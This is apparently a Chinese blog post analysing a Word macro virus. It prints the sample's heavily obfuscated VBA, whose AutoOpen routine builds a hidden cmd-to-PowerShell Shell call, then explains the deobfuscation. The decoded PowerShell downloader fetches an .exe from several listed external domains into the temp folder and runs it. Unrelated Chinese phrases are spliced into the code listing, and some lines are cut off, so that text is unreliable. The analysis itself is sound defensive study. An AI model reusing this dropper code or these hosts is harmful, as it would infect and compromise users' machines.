【宏病毒】Word宏病毒简单分析
前⾔
最近对Office系列宏病毒⽐较感兴趣,⽹上找了⼀个Word样本练练⼿,宏病毒常⽤套路⼀般都是利⽤PowerShell从服务器上下载PE⽂件执⾏,或者数据流中内嵌PE⽂件借助RTF释放执⾏。
所以分析宏病毒⼀般都⽐较简单,查看VBA代码基本就能知道病毒执⾏的内容,但是如果代码中的函数、变量、字符串等都经过混淆,分析起来难度就会提⾼。
详细分析
诱导⽤户启⽤宏代码
铃兰花花语
如果启⽤内容,宏代码就会执⾏,我们先看下⽂档中的数据流。
从"DMSojZquJ"和"wAwJBjJQJ"数据流中DUMP下宏代码,代码经过严重混淆,我们从“AutoOpen”⼦程序开始分析。
1'Attribute VB_Name = "wAwJBjJQJ"
2Function RTUHFOzsK()
3 SSIhYOGKB = BBqMNPjSw
4 bkspY = Mid("zYsMfzXjUkZcWdEGwAVSztCl", 12, 1)
5 pGHmjw = bkspY
6 THZbsWKtF = GApwOicZH
7 VEbORpJELT = Mid("w ULjXwAKAb", 2, 2)
8 siCAq = VEbORpJELT
9 HPhRfOHnm = TOvllapZt
10 jpucp = Mid("dwOtbdJnhnCwfmAwZ qUwQ", 18, 2)
11 aLAikTZzXH = jpucp
12 fqalXfJAK = LCnHkoIcD
13 VuuwVO = Mid("sXFWPUriJfKTpqQrVtOvwpYvPcmRpGfQk", 26, 2)
14 FItfpaapu = VuuwVO
15 OBbLUEjqi = KUOOIoowi
16 FVvtMEG = Mid("HdAFDcAsATviDfWzFFzpaz pXJcWfwf", 23, 2)
17 ajJRwS = FVvtMEG
18 jVrCIfDvl = zLiGcJXbX
19 ZrAYDPTq = Mid("iHOvIROFpzkqDsbh OWUdhlpCiwZMTtrODJzmwsH", 17, 2)
20 jiAGQiQw = ZrAYDPTq
21 SUWWCjAwf = vzuwToFbG
22 jmtkTTkrF = Mid("wYuqqVtGZiJmAXAhOSuPBlkv ZpEnSjLlFJZnGcc", 24, 2)
23 GcmZjTwn = jmtkTTkrF
24 LMtwHYSki = ADrFrhRWc
潮汕小吃大全名称
25 NEiTwbDXjd = Mid("ffAMXNhHaz tNilfGXhcTPPsBKcvGidzFR", 11, 2)
26 RjvFUJZEqEH = NEiTwbDXjd
27 LKTKBJzHw = rAsqBBCLO
28 riLqL = Mid("VYSzUNAfirLhNHuvTkkpqTYI NBTb", 25, 1)
29 wjCNaFw = riLqL
30 iVMwDRCAv = nqFMhzLtQ
31 hCfFzWOivq = Mid("HRJzsdTznHRYYLErvnJSVjftUhUujlLVzZfA", 6, 1)
32 NBOCDBCM = hCfFzWOivq
33 nAKjzzabj = lKCqCjSmA
34 bGAdVi = Mid("RMiPstNpOmmrqQf/wzkf", 16, 1)
35 uFHPYHoifcS = bGAdVi
36 PNGBIBOLR = tiTviHlPK
37 BzbiCjnQqm = Mid("AikEQJtLfHomiYXDjK /fbjKtsWuJLaJzImkOi", 19, 2)
38 IjUTlUqWHO = BzbiCjnQqm
39 EuXMYbiQq = tznZtuwvj
40 rZKmALU = Mid("ijpGMkvqVjf zj", 12, 2)
41 uGUWvBHvsD = rZKmALU
42 RTUHFOzsK = FItfpaapu + NBOCDBCM + IjUTlUqWHO + GcmZjTwn + uFHPYHoifcS + pGHmjw + jiAGQiQw + RjvFUJZEqEH + siCAq + uGUWvBHvsD + ajJRwS + aLAikTZzXH + wjCNaFw
43End Function
44Sub AutoOpen()
45 KlsJVlijz
46End Sub
1'Attribute VB_Name = "DMSojZquJ"
2Function KlsJVlijz()
3 KRwZOZiSb = jMiOqzLkc
4 TzurouRwtt = Mid("juDEAMQA2AGIANQA5LfDuHPHXHoVdEQfRC", 3, 15)
5 iKnPNTjHYUN = TzurouRwtt
上火喝什么茶可以去火
6 TsfRjzdCc = wGUKHjjwm
7 SAIGYDAjD = Mid("Ur8BJGqnnB5Yult %cDpiTrLVN%=wers&&t %SuZmiriSa%=JwsADfCTs&&t %KlsJVlijz%=po&&t %qfSAwAXEM%=MrqzTiJDT&&t %PqjuFnVOr%=hell&&t %SqYwAARBW%=VcQFWjpkv&&!%KlsJVlijz%!
8 iBSRmkhEj = SAIGYDAjD
9 XtczUhZho = sGlQtlEVs
10 HdFRsCmu = Mid("zQDZhA3kAOQB7ADEAMQA2AGIAMQAwADUAYgAxADEAMQA6ADEAMQAwAFkANAA2AH4AMQAwADAMuwW3nHiNYrXXhKvuQhjarIPjtM", 8, 65)
11 JZJjMfIbBG = HdFRsCmu
12 PthzvLzhL = GZEufrNor
13 aJFENXB = Mid("2iwApzVhvrZAEkAMQAxADEAegA0ADYAbQAxADEAMAAmADEAMAA4AH4ANAA3AHsAMQAxADYAYgA2ADYAJgAxADAAMgB+ADQANwBZADMAOQB+ADQANgB6ADgAMwBiADEAMQAyAH4AMQAwADgAWQAxAD
14 TjXFztBK = aJFENXB
15 zUYzrCIlv = qfMjGmrTF
16 bEHOc = Mid("LnMwj8vivvwTnBW06hAzADIASQAxADEAMABZADEAMAAxACEAMQAxADkAJgA0ADUAJgAxADEAMQB6ADkAHc", 19, 62)
17 AcOZjKGHd = bEHOc
18 EYzRCmWTI = kzbtDFuEB
19 KtWFTJiUI = Mid("flGAbQ8jdVC6Iw5wGU3kFwCpYhBY7ADkAOAA6ADEAMAA2AG0AMQAwADXlAW41AL0oV", 29, 27)
20 RkSMsXZmbbj = KtWFTJiUI
21 TSBfqKPHC = wXTSDLmIQ
22 iBobiw = Mid("QSw3OIaCMAwAHsAMQAxADAAOgAxADAAMQAmADEAMQA2AGIANAA2ACEAMQAwADAAOgAxADAAMQBiADQANwAmADEAMQA0AEkANAA3AH4ANAA0AHoAMQAwADQAbQAxADEANgBZADEAMQA2ACYAMQAxA
23 mvotcU = iBobiw
24 uiSlbYuXn = TwcHoBkXB
25 iaBTlajaUKt = Mid("znY7zKn7hBOVIFz6X%cDpiTrLVN%!!%PqjuFnVOr%! -e LgAgACgAKAB2AEEAUgBpAEEAYgBMAGUAIAAnACoAbQBEAFIAKgAnACkALgBuAGEAbQBFAFsAMwAsADEAMQAsADIAXQAtAEoATwBJAG4AJwAnACkA
26 XvLAfRK = iaBTlajaUKt
27 EZhmBvkXw = pStPHvpAV
28 wLTmWqsTK = Mid("FfAHsAMQAwADUAYgAxADEANQBZADEAMQA2AH4AMQAxADQAbQTLWzcjuipSiEo", 3, 46)
29 orwEYmMBR = wLTmWqsTK
30 jhqckTXvK = ZriRhfKhi
31 wdpalVvA = Mid("I6iEVXN1GLwpHCz8Ijwm06KbVIuAJgAxADAAMQBJADQANwAhADcAOAB7ADgAOQAhADEAMAA3AEkAOAAzAG0AMQAwADIAJgA0ADcAegA0ADQAJgAxADAANAB6ADEAMQA2AH4AMQAxADYAIQAxADEAMgB7AD
32 nGmuz = wdpalVvA
33 iHhXBDcFF = tDohRofBp
34 IWIok = Mid("RjADIAJgA0ADMAbQAzADIAYgNG9GurhlHcLP2Co6oWzLFSwmkhv4ldioX", 3, 22)
35 TBNjdzzzh = IWIok
36 KbpOPFkKj = NXkOFaMGs
37 AsoLI = Mid("fSiIEDACYAMwA2AG0AMQAxADQAbQA5ADcAegAxADEAMABiADEAMAAwACYAMQAxADEAegAxADAAOQAhADMAMgBJADYhjj3jjAuppqRGqKrh1T", 7, 82)
38 FRdXUFElRa = AsoLI
39 oLjmAfOds = VsZuljqAF
40 ISYEi = Mid("BVjP8jiqhGziNiDAAOQBiADQANwBJADgAMwBiADEAMAA3ACYANgA1ADoAOAA1AFkANAA3AFkANAA0ACYAMQAwADQAegAxADEANgBiADEAMQA2ACYAMQAxADIAewA1ADgAJgA0ADcAegA0ADcAOgAxADAAOQBtA
41 fizsQ = ISYEi
42 tUscmqXOh = UfwOUKvrp
43 mnbclQddw = Mid("iPPaU89tkLifQBor34HASQB+AHoAJwAgACkAIAB8ACAAJQB7ACgAIABbAEkAbgB0AF0AJABfAC0AYQBTACAAWwBDAEgAYQByAF0AKQdQsE", 20, 83)
44 cslql = mnbclQddw
45 JXbJzlNOS = GTmEXEUTm
46 GbEiUOiVXw = Mid("ziITYGiIamHpoZHgB+ADgAMwB7ADEAM1t26K9TjQqMzHzEYiu", 16, 16)
47 YhuVfBw = GbEiUOiVXw
48 AMYpPlzuw = tHXOwuqjd
49 nwTYnBKp = Mid("I3DEAMAAx6EkAh4h7va", 3, 7)
50 zwsMjwQJTv = nwTYnBKp
51 djUGOYYRv = vPHtuBYvi
52 WrfmRXK = Mid("Jmcs93jA5rYAMQBJADMAMgB6ADEAMQAwACYAMQAwADEAIQAxADEAOQAmADQANQAmADEAMQAxAH4AOQA4AFkAMQAwADYAYgAxADAAMQAhADkAOQBtADEAMQA2AHoAMwAyAEkAMQAxADQAegA5ADc
53 awBiLS = WrfmRXK
54 QTIqMFnTG = urVrNrbqk
55 fwizQHrrKMl = Mid("7ZNCDjkd16F3vJwZADEAMAAxAG0AMQAwADkAYgA0ADYASQA3ADgAWQAxADAAMQA6ADEAMQA2AGIANAA2AGIAOAA3AH4AMQAwADEASQA5ADgAbQA2ADcAYgAxADAAOABJADEAMAA1ADoAMQAwADE
56 kzLPNEjwRpi = fwizQHrrKMl
57 StzAQwpCi = qzNWqCPaM
58 HYhqTVjz = Mid("NlUNOMQB7ADQANwAhADEAMQA4AHsAOAA3AG0AMQAwADMAOgA0ADcAbQA0ADQAJgAxADAANAAhADEAMQA2AG0AMQAxADYAewAxADEAMgBiADUAOAAhADQANwBiADQANwAmADkANwB6ADEAMAAwAF
59 OXrPUEbnvR = HYhqTVjz
60 UnXOTvRiZ = ZDBQRDQGC
61 aOmzViYRI = Mid("q4zoiVLRd4XVFkAFkAOQA5ACEAOQA3AHoAMQAxADYAfgA5ADkAfgAxADAANABiADEAMgAzACEAMQAxADkAfgAxADEAI71o4", 15, 76)
62 KIwkY = aOmzViYRI
63 jQCKAJbwT = tXBTbniGD
64 mTTdkG = Mid("09MYoVDXOQBiADEAMgAxAH4AOQA4AFkAMQAxADcAewAxADIAMQB+ADEAMAA1AG0AMQAxADAAegAxADAAMwBJADkANwB6ADEAMAAzAHoAMQAwADEAOgAxADEAMAA6ADEAMQA2ACYANAA2AG0AOQA5
65 CPOtaunKXFw = mTTdkG
66 MDaCimYPz = cahKFjzjJ
67 jENmKtocosG = Mid("Om2EAOgA5ADkAbQAxADEANgBiADMAMgBiADQANQAhADYANwBJADEAMQAxACYAMQAwADkAbQA3ADkAOgA5ADgAfgAxADAANgBiADEAMAAxAFkAOQA5AEkAMQAxADYAbQAzADIAfgA4ADcAYgA4ADMA
68 IAFUul = jENmKtocosG
69 KKmNnWbYG = XGbNmLAEC
70 wwuaTvRloii = Mid("rizBpdohTDQANwBiADQANwAmADEAMAAxAFkAMQAwADAAYgAxADEAMQB7ADEAMQqMh4QsW0tSwB7NpOpYfO", 10, 53)
71 muHlMzvW = wwuaTvRloii
72 cihQlkKwW = mjSSTsdUv
73 NkhKkqUcZzS = Mid("3sTuj9MB568wAFkANgA4AHoAMQAxADEASQAxADEAOQAhADEAMQAwACEAMQAwADgAWQAxADEAMQA6ADkANwBiADEAMAAwAFkANwAwACYAMQAwADUAOgAxADAAOAAhADEAMAAxAEkANAAwAG0A
74 wJLOSQhR = NkhKkqUcZzS
75 QzQDbKjBI = XPoWJBjXF
76 fYzIS = Mid("t8Qv5AEmsBzcKQuRLtPfWP2haoJiOWTEJKWZADUAYgAxADEAMABZADMAMgAmADMANgA6ADEAMQA3AH4AMQAxADQAfgAxADAAOAB7ADEAMQA1ACYANAAxAFkAMQAyADMAYgAxADEANgBJADEAMQA0AH4AM
77 bbvLjLAvSJ = fYzIS
78 ctZCDozpo = oFnijRPjE
79 ZXRkXlUKciC = Mid("K3jBHqR0qD19138PwR5IMndSACWcuccASQAxADAAMwB+ADEAMAAxAHoAMQAxADAAfgAxADEANgAmADEAMQA1AEkAMQAwADUAOgAxADEAMABJADkANwBtADzEX", 31, 88)
80 LPwcEG = ZXRkXlUKciC
81 mYCWkjbmj = iPZQlvnBa
82 CaTTBtvHd = Mid("fNzJ623CmpME4BTWDGQSANQAzAHsANQAzAFkANQAxAUXUX", 21, 22)
83 fcjRIRH = CaTTBtvHd
84 WOvbEmVrw = VofWHZwuw
85 JozUMVXQNC = Mid("IUU0INAxAH4AMQAxADUASQAxADEANQA6ADMAMgAmADMANgAmADEAMQAyAGIAOQA3AHsAMQAxADYASQAxADAANAB+ADUAOQAhADkAOAB7ADEAMQA0AGIAMQAwADEAOgA5ADcAWQAxADAANwB
86 fhXwGUGo = JozUMVXQNC
87 CFJqaQFQZ = PYTsvirtV
88 dnCicIqnDi = Mid("0GrwGzcA1BiqDQ2HsANAAwAHsAMwA5AH4ANAA0AG0AMwA5AEkANAAxACEANQA5AG0AMwA2ACEAMQAxADAAjNwtq8wXSXLbhwY25YY", 16, 67)
89 HczVFWDHVzj = dnCicIqnDi
90 JKUQBsnGw = DMHzTrwkw
91 ckRwBHp = Mid("66II1QkGmQO0bkrwXG7UDHLdjDEAMAAmADkANwB6ADEAMAA5ADoAMQAwADEAegAzMiwv58sW2z8", 26, 39)
92 lbjqdjR = ckRwBHp
93 QjnfWnMGT = cctziOEnj
94 nRJpoij = Mid("JwuGuPV1D5MOLRcplDEAMQAwAGIANAA2AGIAMQAwADAAYgAxADAAFm3RsjWO", 18, 35)
95 SPEOqDL = nRJpoij
96 imEQCTSBE = SPEcvKlaM
97 zGITmmFi = Mid("nXkCVcOVDCIGIANQA0ACEANAAxAHsANQA5AFkAMwA2AG0AMQAxADIAOgA5ADcAewAxADEANgBJADEAMAA0AHoAMwAyAEkANgAxAG0AMwAyAHoAMwA2AFkAMQAwADEAWQAxADEAMAB6ADEAMQA4AFk
98 rBTCHaK = zGITmmFi
99 hdnhDuYKd = FGitvjHSw
100 tkqnlH = Mid("wdHfrVfjbwADcAOgAxADEANwB7ADEAMQA1ACYANAA1AHoAMQAwADIAYgAxADAAOAB6ADEAMAAxAH4AMQAwADUAWQAxADEANQBZADkAOQAhADEAMAA0AH4AMQAwADkAYgA5ADcAYgAxADEAMAB6A11BH3 101 ScIOzQwUMHj = tkqnlH
102 szdUNVjur = PzhiLEBWJ
103 wzamU = Mid("whNAB6ADEAMAA4AGIANAA2AG0AOAA0AGIAMQAxADEAfgA4ADMAegAxADEANgBiADEAMQA0AG0AMQAwADUAbQAxADEAMAA6ADEAMAAzACEANAAwAG0ANAAxAHoANAA0AHoAMwAyACEAMwA2AG0A4vOqB 104 MthJuYP = wzamU
105 vziJsrqMu = WYTXVcMta
106 cqwMU = Mid("QjnkEoQif0vzwRUpzj9DcrA5AH4AMQAxADQAWQAxADAANQB+ADEAMQAyACEAMQAxADYAOgAzADIAWQA2ADEAbQAzADIAWQAxADEAMAAhADEAMAAxADoAMQAxADkAYgA0ADUAIQAxADEAMQBU0ntYjnSDmq 107 EbUQjFzQMji = cqwMU
108 jNQSzJDJL = wWvdrZWLV
109 OfVqJ = Mid("TiRt3HNPcKQFXzYzD5zBEbGwegA5ADcAIQAxADAAOQA6ADEAMAAxACYAMwAyAH4ANgAxAFkAMwAyAH4AMwA2AH4AYQhknD2", 25, 64)
110 hpdwFmXNaN = OfVqJ
111 PiHliAaNV = XriEVRdSI
112 IwiDSbtjXNM = Mid("HqijWfnLLYUcpowUZTMNFWFwA2ADEAbQX2fLZc1w1PPk7JVF", 24, 9)
113 LJIEujI = IwiDSbtjXNM
114 sdzZGijtp = zshuBJHwL
115 XNpKBSQp = Mid("kf6rX0J0wo7sLii6ADEAMQAxAH4AMQAxADAAJgA0ADYAWQA3ADcAYgAxADAAMQB7ADEAMQA1AFkAMQAxADUAegJ2BQk9m", 16, 71)
116 LPjrKRijIw = XNpKBSQp
117 SzjQrknfR = jrBdAZQdi
118 jwrGYdkzCNC = Mid("AtDEANABZADEAMAA1ADoAMQAxADIAIQAxADEANgAmADQAN6f6zpUDiWd", 3, 44)
119 EzTYX = jwrGYdkzCNC
120 WqbZFkKbV = ncqVzZGKU
121 CmzXsmGKojc = Mid("rTCDYRjjiCNAA6ADEAMAA1AH4AMQAxADYASQAxADAAMQB6ADQANQA6ADEAMAA0AGIAMQAxADEAIQAxADEANQBJADEAMQA2AEkAMwAyADoAMwA2AFkAOQA1ACYANAA2AEkANgA5ACYAMQAyADA 122 QYpwllzTSck = CmzXsmGKojc
123 ZclPlaQAC = oWrIiXalF
124 mAwtjzQ = Mid("dkAOgAxADAAOAA6ADEAMAA1ACEAMQAwADEAOgAxADEAMABZADEAMQA2AFkANAA2uJOYi2zO48HmdXNomG2zwpfcShY3M2zJnYLB", 2, 62)
125 ZbAAifkPrvN = mAwtjzQ
126 jtszGQPAD = bKtbWpErB
127 oWJLO = Mid("i3TbIXnBQGAxADIAMwBZADMANgB+ADEAMQA5ACYAMQAwADEAegA5ADgAegA5ADjWE", 11, 52)
128 DGLkaA = oWJLO
129 zHFAIEhVF = dfwTvMTXR
130 EKYFiRhEXFw = Mid("KnNUzlTmADEAMAAwADoAMQAxADEAJgAxADAAOQA6ADQANgB7ADEAMQAwADoAMQAwADEAegAxADIAMABJADEAMQA2AH4ANAAwAG0ANAA5AFkANAA0AFkAMwAyACYANQA0AG00PriiWvtTcTzBJm2 131 zSGEI = EKYFiRhEXFw
132 cZWVzlXoq = JMzCDmWdd
133 SFdjwWp = Mid("zPHvKMQAxADIASQA5ADcAWQAxADEANgBiADEAMAA0ACEANAAxACEANQA5AHoAOAAzADoAMQAxADYASQA5ADcASQAxADEANAA6ADEAMQA2AHoANAA1AGIAOAAwAFkAMQAxADQAYgAxADEAMQAhADk 134 OkBajT = SFdjwWp
135 ziknRkKlU = EIPhIwXbR
劳动法离职
136 DcABZPAtp = Mid("Ph4HGzYkfOCGqZiwdDGa3TvRI46jLtBiSAzADkAIQA0ADYAIQAxADAAMQA6ADEAMgAwAHsAMQAwADEAJgAzADkAfgA1ADkAfgAxADAAMgA6ADEAMQAxACEAMQAxADQAegAxADAAMQAmADkANwB+ADkAOQ 137 CWMpLVkSS = DcABZPAtp
138 ibHUdTOYI = FabLwRiUp
139 cBUrWQJBDX = Mid("XmOJgAxADAAOAA6ADEAMQA1AGIzN3QzjhpYQj5G3IKoCPMI", 4, 23)
140 lcPiAkbq = cBUrWQJBDX
141 hpIlKOQSj = bbEBfbVrB
142 MvpXHXC = Mid("z5nzXvB8SLdaMXOJ2AMwAyAEkANgAxACYAMwAyAGIAMwA5ACYAMQAwADQAWQAxADEANgB+ADEAMQA2AEkAMQAxADIAJgA1ADgAYgA0ADcAJgA0ADcAbQA5ADSC", 18, 103)
吸烟的好处143 HnZjzd = MvpXHXC
144 WiEQYtbFL = stLzwnJqm
河南游
145 vajVOP = Mid("RGKthsDsJzwtA5ADcAYgAxADAAMwBJADEAMAAxAHsANQA5AFkAMQAyADUAfgAxADIANQAnAC4AcwBQAEwAaQBUACgAIAAnAFkAJgB7AG0AOgBiACE8UDpdPzMzSYXt3P57", 13, 101)
146 GzjkYUBnqXG = vajVOP
147 JtQsEKnnw = DEvzqFPLp
148 kEROiFMIq = Mid("j4Ja9dOW453qN2YADEAMAA5AEkZA0c3hwNX3JwzjtcQXbvF6aP", 16, 11)
149 icAYwsLVpUA = kEROiFMIq
150 kQQOJFDXZ = UddQropLw
151 irUIcwRD = Mid("Au1EHs6ti0AmADUAOQB6ADMANgAmADEAMQA3AHsAMQAxADQA7Wj9C5z0PqNsb2IoN9LTqN", 11, 38)
152 bapZdDJB = irUIcwRD
153 kdaudlwYB = PtDFhmwZZ
154 iFmWVaPu = Mid("AX2dCwbGzBwRzR0B9ACAAKQAtAEoATwBpAG4AJwAnACAAKQA=57cAXn5i8m8q2JvPWDXAo", 16, 34)
155 KbFniuHlZAr = iFmWVaPu
156 WujLpjlSJ = TnMGKiHih
157 hfcbdZkXOQ = Mid("MofaM2kwYCF3hI3pREPq5wADEAWQA5ADkAhBAoZ3SX", 22, 13)
158 OWGLMOBo = hfcbdZkXOQ
159 OpniRlEni = VOwqRSPSQ
160 zXXPDkaDCDf = Mid("UMBH8K03MAPWjNr4AA0AHsAMQAwADEAYgAxADAAOAB+ADEAMAA4AGIANQA5ACYAMwA2ACEAMQAxADkAegAxADAAMQBZADkAOAAmADkAOQB6ADEAMAA4AEkAMQAwADUAewAxADAAMQBZADEA 161 iCUMSYusIv = zXXPDkaDCDf
162 OZouIKbdk = oJiYwCEkj
163 pDDDLci = Mid("5l8w3MoVMQAxADQAOgA5ADcAegAxADEAMAArVwfzX20rok3a", 9, 27)
164 NwSKajzAjmw = pDDDLci
165 lrczHCBPD = NcVurrNsF
166 cYFmodmUji = Mid("Xr8i8vwXK63tEGUAFM4fpIlA5ADcASQAxADEANgB7ADEAMAA1AGIAMQAwADEAIQAxADAANwBtADkANwBZADEAMQAwACYAMQAxADYASQAxADEAMQBiADEAMQAxAG0AMQAxADQAWQA5ADkAewAxADAA 167 kKRBFkTYOSq = cYFmodmUji
打钎168 tThcDoAPi = vzQtlhidb
169 FPmzKLZZjn = Mid("UZV2SLzYBcmKjhjOAB7ADEAMAA2ADoAMQAuW61n", 16, 19)
170 bYcfSuOhsf = FPmzKLZZjn
171 nRRltsHOB = PtSrLGzLR
172 KftEZiGv = Mid("ZOQB6ADEAMQA1AG0AOQGqcXPjVTGBVwHur", 2, 18)
173 PcapUM = KftEZiGv
174 CIoowrYFS = nUqoLNQZb
175 CfjsS = Mid("pZPkhRPZtdoEjR3UWRwYAMQAxADIAWQAzADIAegA0ADMAegAzADIAbQAzADkASQA5ADIAegAzADkAIQAzADIAYgA0ADMAOgAzADIAJgAzADYAYgAxAoA", 21, 94)
176 sbpNlLMLdC = CfjsS
177 nHaoVpmlW = MEmKwaQjV
178 haGppvzwpLm = Mid("MWhOm3Q1WQAxADEANgB+ADMAMgB7ADgAMwBJADEAMgAxAHsAMQAxADUASQAxADEANgB7v", 9, 59)
179 wZkHuAqmza = haGppvzwpLm
180Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + 181End Function
⼦程序中⾸先调⽤了"DMSojZquJ"模块的"KlsJVlijz"函数,函数代码经过严重混淆,但是通过函数结尾的“Shell”关键字我们猜测病毒执⾏了某个程序或命令⾏。
1'使⽤参数0来隐藏执⾏程序或命令⾏
2Shell$ RTUHFOzsK + Chr(34) + iBSRmkhEj + XvLAfRK + PcapUM + EbUQjFzQMji + RkSMsXZmbbj + IAFUul + EzTYX + YhuVfBw + iCUMSYusIv + LJIEujI + AcOZjKGHd + bYcfSuOhsf + OWGLMOBo + wZkHuAqmza + kzLPNEjwRpi + i 我们修改代码,使⽤MsgBox函数输出执⾏内容。
发现是通过Cmd调⽤PowerShell执⾏命令。
1'拼接“powershell”字符串
2t %cDpiTrLVN%=wers '赋值“wers”
3 &&t %SuZmiriSa%=JwsADfCTs '混淆
4 &&t %KlsJVlijz%=po '赋值“po”
5 &&t %qfSAwAXEM%=MrqzTiJDT '混淆
6 &&t %PqjuFnVOr%=hell '赋值“hell”
7 &&t %SqYwAARBW%=VcQFWjpkv '混淆
8 &&!%KlsJVlijz%! '拼接“po”
9 !%cDpiTrLVN%! '拼接“wers”
10 !%PqjuFnVOr%! '拼接“hell”
Ba64解密PowerShell命令。
解码后的数据同样经过混淆,解混淆的⽅法是去掉⽆⽤字符串,将⼗进制数值转换为对应的ASCII字符。
因为第⼀⾏的3、11、2转换为ASCII字符后不能显⽰,所以从第⼆⾏的36开始,以此类推。
代码通过“DownloadFile”从指定服务器下载exe⽂件,以随机数作为exe⽂件名,将⽂件保存到系统temp⽬录下。然后使⽤“Start-Process”执⾏exe⽂件。
1#转码后的PowerShell命令
2$wscript = new-object -ComObject WScript.Shell;
3$webclient = new-object System.Net.WebClient;
4$random = new-object random;
5$urls = 'agentsinaction.de/NYkSf/,edonnet.de/r/,/SkAU/,markus-fleischmann.de/vWg/,administratiekantoorcleo.nl/tBf/'.Split(',');
6$name = $(1, 65536);
7$path = $env:temp + '\' + $name + '.exe';
8foreach($url in$urls){
9 try{
10$webclient.DownloadFile($url.ToString(), $path);
11 Start-Process$path;break;
12 }
13 catch{write-host $_.Exception.Message;}猫狗壁纸
分析完代码,“Alt+F11”打开宏代码,修改shell显⽰参数=1,调试看下运⾏结果。可能是时间太久服务器已经失效,代码并未执⾏成功。
总结
宏病毒基本的分析步骤就是这些,后续对PE样本的分析和平时都是⼀样的,唯⼀不同的就是病毒会使⽤各种混淆来阻⽌分析,另外⾃⼰也⽐较菜,这篇⽂章就算是⼀个好的开端,等以后遇到其它样本在好好分析总结吧。
